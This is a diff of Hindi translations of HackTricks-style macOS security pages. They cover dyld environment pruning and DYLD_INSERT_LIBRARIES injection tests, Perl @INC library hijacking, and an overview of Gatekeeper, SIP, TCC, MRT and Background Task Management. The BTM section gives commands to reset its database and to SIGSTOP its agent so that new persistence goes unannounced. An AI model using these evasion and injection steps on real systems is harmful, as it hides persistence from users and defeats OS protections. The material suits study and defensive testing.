-यदि OSX को लक्ष्य बनाया जाता है, तो यह फ़ंक्शन उसी फ़ाइल के **`_main`** फ़ंक्शन से कॉल किया जाता है:
+फाइल `dyld-dyld-832.7.1/src/dyld2.cpp` में **`pruneEnvironmentVariables`** नामक फंक्शन को ढूंढा जा सकता है, जो किसी भी env वेरिएबल को हटा देगा जो **`DYLD_` के साथ शुरू होता है** और **`LD_LIBRARY_PATH=`**.
+
+यह **suid** और **sgid** बाइनरीज के लिए विशेष रूप से env वेरिएबल्स **`DYLD_FALLBACK_FRAMEWORK_PATH`** और **`DYLD_FALLBACK_LIBRARY_PATH`** को भी **null** पर सेट कर देगा।
+
+यह फंक्शन उसी फाइल के **`_main`** फंक्शन से बुलाया जाता है यदि OSX को इस तरह टारगेट किया जा रहा हो:
 ```cpp
 #if TARGET_OS_OSX
 if ( !gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache ) {
 pruneEnvironmentVariables(envp, &apple);
 ```
-और वे बूलियन फ्लैग्स कोड में ही उसी फ़ाइल में सेट किए जाते हैं:
+और वे बूलियन फ्लैग्स उसी फाइल में कोड में सेट किए जाते हैं:
 ```cpp
 #if TARGET_OS_OSX
 // support chrooting from old kernel
@ -202,13 +173,9 @@ gLinkContext.allowClassicFallbackPaths   = !isRestricted;
 gLinkContext.allowInsertFailures         = false;
 gLinkContext.allowInterposing         	 = true;
 ```
-जो इसका मतलब है कि यदि बाइनरी **suid** या **sgid** है, या हेडर में **RESTRICT** सेगमेंट है या यह **CS\_RESTRICT** फ्लैग के साथ साइन किया गया है, तो **`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** सत्य होता है और env variables को काट दिया जाता है।
+## प्रतिबंधों की जाँच करें

-ध्यान दें कि यदि CS\_REQUIRE\_LV सत्य है, तो चर env variables को काटा नहीं जाएगा लेकिन पुस्तकालय सत्यापन यह जांचेगा कि वे मूल बाइनरी के साथ समान प्रमाणपत्र का उपयोग कर रहे हैं।
-
-## प्रतिबंधों की जांच करें
-
-### SUID और SGID
+### SUID & SGID
 ```bash
 # Make it owned by root and suid
 sudo chown root hello
@ -219,14 +186,14 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello
 # Remove suid
 sudo chmod -s hello
 ```
-### धारा `__RESTRICT` और सेगमेंट `__restrict`
+### अनुभाग `__RESTRICT` सेगमेंट `__restrict` के साथ
 ```bash
 gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict
 DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict
 ```
 ### हार्डन्ड रनटाइम

-कीचेन में एक नया प्रमाणपत्र बनाएं और इसे बाइनरी को साइन करने के लिए उपयोग करें:
+कीचेन में एक नया प्रमाणपत्र बनाएं और उसका उपयोग बाइनरी को साइन करने के लिए करें:

 {% code overflow="wrap" %}
 ```bash
@ -251,23 +218,25 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work
 {% endcode %}

 {% hint style="danger" %}
-ध्यान दें कि यदि किसी बाइनरी के साथ झंडे **`0x0(none)`** के साथ हस्ताक्षर हैं, तो जब उन्हें निष्पादित किया जाता है, तो वे गतिशील रूप से **`CS_RESTRICT`** झंडा प्राप्त कर सकते हैं और इसलिए इस तकनीक का उपयोग उनमें नहीं किया जा सकता है।
+ध्यान दें कि यदि कोई बाइनरी **`0x0(none)`** फ्लैग के साथ साइन की गई है, तो भी उन्हें निष्पादित होने पर डायनामिक रूप से **`CS_RESTRICT`** फ्लैग मिल सकता है और इसलिए यह तकनीक उन पर काम नहीं करेगी।

-आप यह जांच सकते हैं कि क्या किसी प्रोसेस में इस झंडे है या नहीं (यहां [**csops**](https://github.com/axelexic/CSOps) प्राप्त करें):&#x20;
+आप यह जांच सकते हैं कि किसी प्रोसेस में यह फ्लैग है या नहीं (get [**csops here**](https://github.com/axelexic/CSOps)):&#x20;
 ```bash
 csops -status <pid>
 ```
-और फिर यह जांचें कि क्या फ्लैग 0x800 सक्षम है।
+और फिर जांचें कि क्या 0x800 फ्लैग सक्षम है।
 {% endhint %}

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की आवश्यकता** है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स को हमें PR के माध्यम से साझा करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को सबमिट करके।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें**।
+* **HackTricks** के [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
@ -2,13 +2,15 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
 * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
+* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.

 </details>

@ -62,13 +64,13 @@ perl -e 'print join("\n", @INC)'
 /System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
 /System/Library/Perl/Extras/5.30
 ```
-कुछ लौटाए गए फोल्डर्स मौजूद नहीं हैं, हालांकि, **`/Library/Perl/5.30`** मौजूद है, यह **SIP** द्वारा **संरक्षित नहीं** है और यह SIP द्वारा संरक्षित फोल्डर्स से **पहले** है। इसलिए, कोई व्यक्ति उस फोल्डर का दुरुपयोग कर सकता है ताकि एक उच्च विशेषाधिकार Perl स्क्रिप्ट उसे लोड करे।
+कुछ लौटाए गए फ़ोल्डर्स मौजूद नहीं हैं, हालांकि, **`/Library/Perl/5.30`** मौजूद है, यह **SIP** द्वारा **संरक्षित नहीं** है और यह SIP द्वारा संरक्षित फ़ोल्डर्स से **पहले** है। इसलिए, कोई उस फ़ोल्डर का दुरुपयोग कर सकता है ताकि एक उच्च विशेषाधिकार वाली Perl स्क्रिप्ट उसे लोड करे।

 {% hint style="warning" %}
-हालांकि, ध्यान दें कि उस फोल्डर में लिखने के लिए आपको **रूट होना आवश्यक है** और आजकल आपको यह **TCC प्रॉम्प्ट** मिलेगा:
+हालांकि, ध्यान दें कि उस फ़ोल्डर में लिखने के लिए आपको **root होना आवश्यक है** और आजकल आपको यह **TCC प्रॉम्प्ट** मिलेगा:
 {% endhint %}

-<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt="" width="244"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" width="244"><figcaption></figcaption></figure>

 उदाहरण के लिए, अगर कोई स्क्रिप्ट **`use File::Basename;`** इम्पोर्ट कर रही है, तो `/Library/Perl/5.30/File/Basename.pm` बनाकर उसे मनमाना कोड निष्पादित करने के लिए बनाया जा सकता है।

@ -78,12 +80,14 @@ perl -e 'print join("\n", @INC)'

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुंच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* अगर आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
 * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **hacktricks repo** में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**।
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
@ -1,20 +1,22 @@
-# macOS सुरक्षा सुरक्षा
+# macOS सुरक्षा संरक्षण

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो**? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की पहुंच** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह विशेष [**NFTs**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
-* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**.
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का अनुसरण करें**.
+* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.

 </details>

-## गेटकीपर
+## Gatekeeper

-गेटकीपर आमतौर पर **क्वारंटीन + गेटकीपर + XProtect** के संयोजन को संदर्भित करने के लिए उपयोग किया जाता है, जो 3 macOS सुरक्षा मॉड्यूल हैं जो **उपयोगकर्ताओं को रोकने का प्रयास करेंगे** पोटेंशियली हानिकारक सॉफ़्टवेयर को डाउनलोड करने से।
+Gatekeeper आमतौर पर **Quarantine + Gatekeeper + XProtect** के संयोजन को संदर्भित करता है, 3 macOS सुरक्षा मॉड्यूल जो **डाउनलोड किए गए संभावित रूप से हानिकारक सॉफ्टवेयर को निष्पादित करने से उपयोगकर्ताओं को रोकने का प्रयास करेंगे**.

 अधिक जानकारी के लिए:

@ -22,41 +24,62 @@
 [macos-gatekeeper.md](macos-gatekeeper.md)
 {% endcontent-ref %}

-## प्रक्रिया सीमाएं
+## प्रक्रियाओं की सीमाएँ

-### SIP - सिस्टम अखंडता संरक्षण
+### SIP - सिस्टम इंटीग्रिटी प्रोटेक्शन

 {% content-ref url="macos-sip.md" %}
 [macos-sip.md](macos-sip.md)
 {% endcontent-ref %}

-### सैंडबॉक्स
+### Sandbox

-MacOS सैंडबॉक्स **सैंडबॉक्स प्रोफ़ाइल में निर्दिष्ट अनुमतियों के साथ चल रहे ऐप्लिकेशन्स को सीमित करता है**। इससे सुनिश्चित होता है कि **ऐप्लिकेशन केवल उम्मीदित संसाधनों तक ही पहुंचेगा**।
+MacOS Sandbox **एप्लिकेशनों को सीमित करता है** जो सैंडबॉक्स के अंदर चल रहे होते हैं, उन्हें केवल **सैंडबॉक्स प्रोफाइल में निर्दिष्ट अनुमत क्रियाओं तक ही सीमित रखता है** जिसके साथ ऐप चल रहा है। यह सुनिश्चित करने में मदद करता है कि **एप्लिकेशन केवल अपेक्षित संसाधनों तक ही पहुँच रहा होगा**.

 {% content-ref url="macos-sandbox/" %}
 [macos-sandbox](macos-sandbox/)
 {% endcontent-ref %}

-### TCC - **पारदर्शिता, सहमति और नियंत्रण**
+### TCC - **पारदर्शिता, सहमति, और नियंत्रण**

-**TCC (पारदर्शिता, सहमति और नियंत्रण)** macOS में एक तंत्र है जो **निश्चित सुविधाओं तक ऐप्लिकेशन पहुंच को सीमित और नियंत्रित करने** के लिए है, आमतौर पर एक गोपनीयता के दृष्टिकोण से। इसमें स्थान सेवाएं, संपर्क, फ़ोटो, माइक्रोफ़ोन, कैमरा, पहुंचियों, पूर्ण डिस्क पहुंच और बहुत कुछ जैसी चीजें शामिल हो सकती हैं।
+**TCC (पारदर्शिता, सहमति, और नियंत्रण)** macOS में एक तंत्र है जो **कुछ विशेषताओं तक एप्लिकेशन पहुँच को सीमित और नियंत्रित करता है**, आमतौर पर गोपनीयता के दृष्टिकोण से। इसमें लोकेशन सेवाएं, संपर्क, फोटो, माइक्रोफोन, कैमरा, पहुँच, पूर्ण डिस्क पहुँच, और बहुत कुछ शामिल हो सकता है।

 {% content-ref url="macos-tcc/" %}
 [macos-tcc](macos-tcc/)
 {% endcontent-ref %}

-### लॉन्च/पर्यावरण सीमाएं और विश्वास कैश
+### लॉन्च/पर्यावरण सीमाएँ & ट्रस्ट कैश

-macOS में लॉन्च सीमाएं प्रक्रिया प्रारंभ करने के लिए एक सुरक्षा सुविधा है जो **कौन प्रक्रिया प्रारंभ कर सकती है**, **कैसे** और **कहां से** परिभाषित करके प्रक्रिया को नियंत्रित करती है। macOS Ventura में प्रस्तुत किए गए, यह सिस्टम बाइनरी को एक **विश्वास कैश** के भीतर नियम श्रेणियों में वर्गीकृत करता है। प्रत्येक निष्पादनीय बाइनरी के लिए इसके **नियम** होते हैं, जिनमें इसके **प्रारंभ**, **माता-पिता**, और **जिम्मेदार** सीमाएं शामिल होती हैं। macOS Sonoma में तृतीय-पक्ष ऐप्स के लिए **पर्यावरण** सीमाएं के रूप में विस्तारित किए गए, ये सुविधाएं प्रक्रिया प्रारंभ की स्थितियों को नियंत्रित करके संभावित सिस्टम उत्पीड़नों को कम करने में मदद करती हैं।
+macOS में लॉन्च सीमाएँ एक सुरक्षा विशेषता है जो **प्रक्रिया प्रारंभ करने को विनियमित करती है** यह परिभाषित करके कि **कौन** प्रक्रिया शुरू कर सकता है, **कैसे**, और **कहाँ से**। macOS Ventura में पेश की गई, यह एक **ट्रस्ट कैश** के भीतर सिस्टम बाइनरीज़ को सीमा श्रेणियों में वर्गीकृत करती है। हर निष्पादन योग्य बाइनरी के लिए **नियम** सेट होते हैं उसके **लॉन्च** के लिए, जिसमें **स्वयं**, **माता-पिता**, और **जिम्मेदार** सीमाएँ शामिल हैं। macOS Sonoma में तीसरे पक्ष के ऐप्स के लिए **पर्यावरण** सीमाएँ के रूप में विस्तारित, ये विशेषताएँ प्रक्रिया लॉन्चिंग की शर्तों को शासित करके संभावित सिस्टम शोषणों को कम करने में मदद करती हैं।

 {% content-ref url="macos-launch-environment-constraints.md" %}
 [macos-launch-environment-constraints.md](macos-launch-environment-constraints.md)
 {% endcontent-ref %}

-## MRT - मैलवेयर हटाने वाला उपकरण
+## MRT - मैलवेयर निकालने का उपकरण

-मैलवेयर हटाने वाला उपकरण (MRT) macOS की सुरक्षा बुनियाद का एक और हिस्सा है। जैसा कि नाम से पता चलता है, MRT का मुख
+मैलवेयर निकालने का उपकरण (MRT) macOS की सुरक्षा अवसंरचना का एक और हिस्सा है। जैसा कि नाम से पता चलता है, MRT का मुख्य कार्य **संक्रमित सिस्टमों से ज्ञात मैलवेयर को हटाना है**।
+
+एक बार जब मैक पर मैलवेयर का पता चलता है (XProtect द्वारा या किसी अन्य माध्यम से), MRT का उपयोग स्वचालित रूप से **मैलवेयर को हटाने** के लिए किया जा सकता है। MRT पृष्ठभूमि में चुपचाप काम करता है और आमतौर पर तब चलता है जब सिस्टम अपडेट होता है या जब एक नई मैलवेयर परिभाषा डाउनलोड की जाती है (ऐसा लगता है कि MRT के पास मैलवेयर का पता लगाने के लिए नियम बाइनरी के अंदर होते हैं)।
+
+XProtect और MRT दोनों macOS के सुरक्षा उपायों का हिस्सा हैं, लेकिन वे अलग-अलग कार्य करते हैं:
+
+* **XProtect** एक निवारक उपकरण है। यह **फाइलों की जाँच करता है जैसे ही वे डाउनलोड की जाती हैं** (कुछ एप्लिकेशनों के माध्यम से), और यदि यह किसी भी ज्ञात प्रकार के मैलवेयर का पता लगाता है, तो यह **फाइल को खुलने से रोकता है**, इस प्रकार आपके सिस्टम को पहली जगह में संक्रमित होने से रोकता है।
+* **MRT**, दूसरी ओर, एक **प्रतिक्रियाशील उपकरण** है। यह सिस्टम पर मैलवेयर का पता चलने के बाद काम करता है, अपराधी सॉफ्टवेयर को हटाने और सिस्टम को साफ करने के उद्देश्य से।
+
+MRT एप्लिकेशन **`/Library/Apple/System/Library/CoreServices/MRT.app`** में स्थित है
+
+## पृष्ठभूमि कार्य प्रबंधन
+
+**macOS** अब हर बार **चेतावनी देता है** जब कोई टूल एक ज्ञात **तकनीक का उपयोग करता है कोड निष्पादन को बनाए रखने के लिए** (जैसे कि लॉगिन आइटम, डेमॉन्स...), ताकि उपयोगकर्ता बेहतर जान सके **कौन सा सॉफ्टवेयर बना रहा है**।
+
+<figure><img src="../../../.gitbook/assets/image (711).png" alt=""><figcaption></figcaption></figure>
+
+यह `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd` में स्थित **डेमॉन** के साथ और `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app` में स्थित **एजेंट** के साथ चलता है।
+
+**`backgroundtaskmanagementd`** को कैसे पता चलता है कि कुछ स्थायी फोल्डर में स्थापित है, यह **FSEvents प्राप्त करके** और उनके लिए कुछ **हैंडलर्स** बनाकर होता है।
+
+इसके अलावा, एक plist फाइल है जिसमें **ज्ञात एप्लिकेशन** होते हैं जो अक्सर एप्पल द्वारा बनाए रखे जाते हैं, स्थित है: `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/attributions.plist`
 ```json
 [...]
 "us.zoom.ZoomDaemon" => {
@ -72,33 +95,31 @@ macOS में लॉन्च सीमाएं प्रक्रिया
 }
 [...]
 ```
-### गणना
+### एन्युमरेशन

-यह संभव है कि आप Apple cli उपकरण के द्वारा कॉन्फ़िगर किए गए सभी पृष्ठभूमि आइटमों की गणना कर सकते हैं:
+Apple के cli टूल का उपयोग करके सभी कॉन्फ़िगर किए गए बैकग्राउंड आइटम्स को **सूचीबद्ध करना** संभव है:
 ```bash
 # The tool will always ask for the users password
 sfltool dumpbtm
 ```
-इसके अलावा, [**DumpBTM**](https://github.com/objective-see/DumpBTM) के साथ भी यह जानकारी सूचीबद्ध करना संभव है।
+इसके अलावा, इस जानकारी को [**DumpBTM**](https://github.com/objective-see/DumpBTM) के साथ सूचीबद्ध करना भी संभव है।
 ```bash
 # You need to grant the Terminal Full Disk Access for this to work
 chmod +x dumpBTM
 xattr -rc dumpBTM # Remove quarantine attr
 ./dumpBTM
 ```
-यह जानकारी **`/private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems-v4.btm`** में संग्रहीत की जा रही है और टर्मिनल को FDA की आवश्यकता होती है।
+### BTM के साथ छेड़छाड़

-### BTM के साथ खिलवाड़
+जब एक नया पर्सिस्टेंस पाया जाता है तो **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** प्रकार की एक घटना होती है। इसलिए, इस **घटना** को भेजने से **रोकने** का कोई भी तरीका या **एजेंट को उपयोगकर्ता को सतर्क करने से रोकना** एक हमलावर को BTM को _**बायपास**_ करने में मदद करेगा।

-जब एक नई स्थायित्व मिलती है, तो एक प्रकार की घटना **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`** को भेजी जाती है। इसलिए, इस घटना को भेजने से रोकने या एजेंट को उपयोगकर्ता को सतर्क करने से किसी भी तरीके से एक हमलावर को BTM को _**छलना**_ में मदद मिलेगी।
-
-* **डेटाबेस को रीसेट करना**: निम्नलिखित कमांड चलाने से डेटाबेस रीसेट हो जाएगा (इसे मूल से पुनः निर्माण करना चाहिए), हालांकि, किसी कारण से, इसके बाद, **सिस्टम को रिबूट किए बिना कोई नई स्थायित्व सतर्क नहीं की जाएगी**।
-* **रूट** की आवश्यकता होती है।
+* **डेटाबेस को रीसेट करना**: निम्नलिखित कमांड चलाने से डेटाबेस रीसेट हो जाएगा (इसे जमीन से फिर से बनाना चाहिए), हालांकि, किसी कारण से, इसे चलाने के बाद, **सिस्टम को रिबूट किए जाने तक कोई नया पर्सिस्टेंस सतर्क नहीं किया जाएगा**।
+* **root** की आवश्यकता है।
 ```bash
 # Reset the database
 sfltool resettbtm
 ```
-* **एजेंट को रोकें**: एजेंट को रोकना संभव है ताकि जब नई पहचानें मिलती हैं, वह उपयोगकर्ता को **चेतावनी न दे**।
+* **एजेंट को रोकें**: एजेंट को एक रुकने का सिग्नल भेजना संभव है ताकि जब नए डिटेक्शन पाए जाएं तो वह **उपयोगकर्ता को सतर्क न करे**।
 ```bash
 # Get PID
 pgrep BackgroundTaskManagementAgent
@ -111,9 +132,9 @@ kill -SIGSTOP 1011
 ps -o state 1011
 T
 ```
-* **बग**: यदि **परिस्थिति जो परिस्थिति बनाई है तुरंत उपस्थित होती है**, तो डीमन इसके बारे में **जानकारी प्राप्त करने** का प्रयास करेगा, **विफल हो जाएगा**, और नई चीज परिस्थित हो रही है इसकी घटना भेजने में **सक्षम नहीं होगा**।
+* **बग**: यदि **प्रक्रिया जिसने पर्सिस्टेंस बनाया है वह तुरंत बाद में तेजी से समाप्त हो जाती है**, तो डेमन प्रक्रिया के बारे में **जानकारी प्राप्त करने** की कोशिश करेगा, **असफल हो जाएगा**, और **नई चीज के पर्सिस्ट होने की घटना भेजने में सक्षम नहीं होगा**।

